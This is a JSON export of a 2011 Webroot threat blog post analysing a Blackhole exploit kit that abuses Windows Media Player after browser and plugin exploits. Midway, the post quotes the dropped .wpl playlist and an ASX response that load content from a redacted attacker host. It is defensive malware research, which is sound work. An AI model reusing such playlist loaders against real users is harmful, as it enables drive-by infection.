{"id":5458,"date":"2011-11-11T10:11:57","date_gmt":"2011-11-11T17:11:57","guid":{"rendered":"http:\/\/blog.webroot.com\/?p=5458"},"modified":"2018-01-30T13:16:01","modified_gmt":"2018-01-30T20:16:01","slug":"this-blackhole-exploit-kit-gives-you-windows-media-player-and-a-whole-lot-more","status":"publish","type":"post","link":"https://www.webroot.com/blog/2011\/11\/11\/this-blackhole-exploit-kit-gives-you-windows-media-player-and-a-whole-lot-more\/","title":{"rendered":"This blackhole exploit kit gives you Windows Media Player and a whole lot more"},"content":{"rendered":"<p><a title=\"Webroot Threat Blog - about the blogger\" href=\"http:\/\/blog.webroot.com\/about\/\" target=\"_blank\"><strong>By Mike Johnson<\/strong><\/a><\/p>\n<p>As a follow-up to the <a title=\"Outdated Operating System? This BlackHole Exploit Kit has you in its sights\" href=\"http:\/\/blog.webroot.com\/2011\/10\/31\/outdated-operating-system-this-blackhole-exploit-kit-has-you-in-its-sights\/\">Blackhole Exploit posting<\/a>, I thought I would share one aspect of my job that I truely enjoy: Discovery.<\/p>\n<p>While investigating some active urls being served up via a blackhole kit, I noticed something quite odd, as I would\u00a0end up on\u00a0sites that had\u00a0malicious\u00a0code injected into their webpages.<\/p>\n<p>Once the redirection to the blackhole kit was initiated, I saw the usual exploits taking place, first being Internet Explorer and Adobe Flash, then onto Adobe Reader and Java.<\/p>\n<p>This time, the kit\u00a0didn&#8217;t\u00a0stop there. Internet Explorer proceeded to launch Windows Media Player. Since I had never used it on this test machine, the Windows Media Player install sequence initiated, causing the windows media player setup screen to appear in order to\u00a0finalize\u00a0its installation.<\/p>\n<p>I became\u00a0curious as to what Windows Media Player is being used for.\u00a0Unfortunately\u00a0in this case, I couldn&#8217;t see where any files were called down to the machine and did not have any type of network analyzer running.<\/p>\n<p style=\"text-align:center;\"><a href=\"http:\/\/webrootblog.files.wordpress.com\/2011\/11\/blackhole-exploit001.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-5461\" title=\"Blackhole Exploit001\" src=\"http:\/\/webrootblog.files.wordpress.com\/2011\/11\/blackhole-exploit001.jpg\" alt=\"\" width=\"640\" height=\"480\" \/><\/a><\/p>\n<p><!--more--><\/p>\n<p>It is possible this is a specific plugin request from the people running this particular exploit kit. Looking at some of the images below, there is definitly some network traffic initiated using Windows Media Player.<\/p>\n<p style=\"text-align:center;\"><a href=\"http:\/\/webrootblog.files.wordpress.com\/2011\/11\/blackhole-exploit-002.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-5460\" title=\"Blackhole Exploit 002\" src=\"http:\/\/webrootblog.files.wordpress.com\/2011\/11\/blackhole-exploit-002.jpg\" alt=\"\" width=\"448\" height=\"336\" \/><\/a><\/p>\n<p style=\"text-align:center;\"><a href=\"http:\/\/webrootblog.files.wordpress.com\/2011\/11\/blackhole-exploit003.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-5462\" title=\"Blackhole Exploit003\" src=\"http:\/\/webrootblog.files.wordpress.com\/2011\/11\/blackhole-exploit003.jpg\" alt=\"\" width=\"640\" height=\"480\" \/><\/a><\/p>\n<p>It seems as soon as Internet Explorer calls Windows Media Player, there is a small Windows Media Player file dropped and executed:<br \/>\n(%userprofile%Application DataMicrosoftMedia Player********.wpl)<\/p>\n<p>This file contains a small amount of code inside it which basically appears to load a malicous url in Windows Media Player. The contents of the wpl file look like this:<\/p>\n<p>&lt;?wpl version=&#8221;1.0&#8243;?&gt;<\/p>\n<p>&lt;smil&gt;<\/p>\n<p>&lt;head&gt;<\/p>\n<p>&lt;meta name=&#8221;Generator&#8221; content=&#8221;Microsoft Windows Media Player &#8212; 9.0.0.4503&#8243;\/&gt;<\/p>\n<p>&lt;title\/&gt;<\/p>\n<p>&lt;\/head&gt;<\/p>\n<p>&lt;body&gt;<\/p>\n<p>&lt;seq&gt;<\/p>\n<p>&lt;media src=&#8221;hxxp:\/\/[removed].com\/content\/hcp_asx.php?f=26&#8243;\/&gt;<\/p>\n<p>&lt;\/seq&gt;<\/p>\n<p>&lt;\/body&gt;<\/p>\n<p>&lt;\/smil&gt;<\/p>\n<p>This URL leads to a page looking similar to this:<\/p>\n<p>&lt;ASX VERSION=&#8221;3.0&#8243;&gt;&lt;PARAM name=&#8217;HTMLView&#8217; value=&#8221;http:\/\/[removed].com\/content\/pch.php?f=26&#8243;\/&gt;&lt;ENTRY&gt;&lt;REF href=&#8221;http:\/\/[removed].com\/content\/1&#215;1.gif&#8221;\/&gt;&lt;\/ENTRY&gt;&lt;\/ASX&gt;<\/p>\n<p>We have only tested this on Windows XP SP3 using Internet Explorer 8 and Windows Media Player 9.0.0.4503. I am currently unsure if this particular exploit will work on Windows Vista or Windows 7.<\/p>\n<p>The main reason this caught my attention is that most, if not all, updates for Windows Media Player are <strong>only<\/strong> included in the Optional Updates &#8212;\u00a0not the Critical Updates we all see <a title=\"Microsoft Security Bulletins\" href=\"http:\/\/technet.microsoft.com\/en-us\/security\/bulletin\/\" target=\"_blank\">monthly from Microsoft<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>By Mike Johnson As a follow-up to the Blackhole Exploit posting, I thought I would share one aspect of my job that I truely enjoy: Discovery. While investigating some active urls being served up via a blackhole kit, I noticed something quite odd, as I would\u00a0end up on\u00a0sites that had\u00a0malicious\u00a0code injected into their webpages. Once [&hellip;]<\/p>\n","protected":false},"author":65,"featured_media":17048,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3005],"tags":[],"yst_prominent_words":[9177,9173,9167,9169,4905,4911,9175,3619,9179,3489,5641,6519,4723,3911,9171,4807,6517,3471,7001,6999],"acf":[],"_links":{"self":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts\/5458"}],"collection":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/users\/65"}],"replies":[{"embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/comments?post=5458"}],"version-history":[{"count":1,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts\/5458\/revisions"}],"predecessor-version":[{"id":17090,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/posts\/5458\/revisions\/17090"}],"wp:featuredmedia":[{"embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/media\/17048"}],"wp:attachment":[{"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/media?parent=5458"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/categories?post=5458"},{"taxonomy":"post_tag","embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/tags?post=5458"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https://www.webroot.com/blog/wp-json\/wp\/v2\/yst_prominent_words?post=5458"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}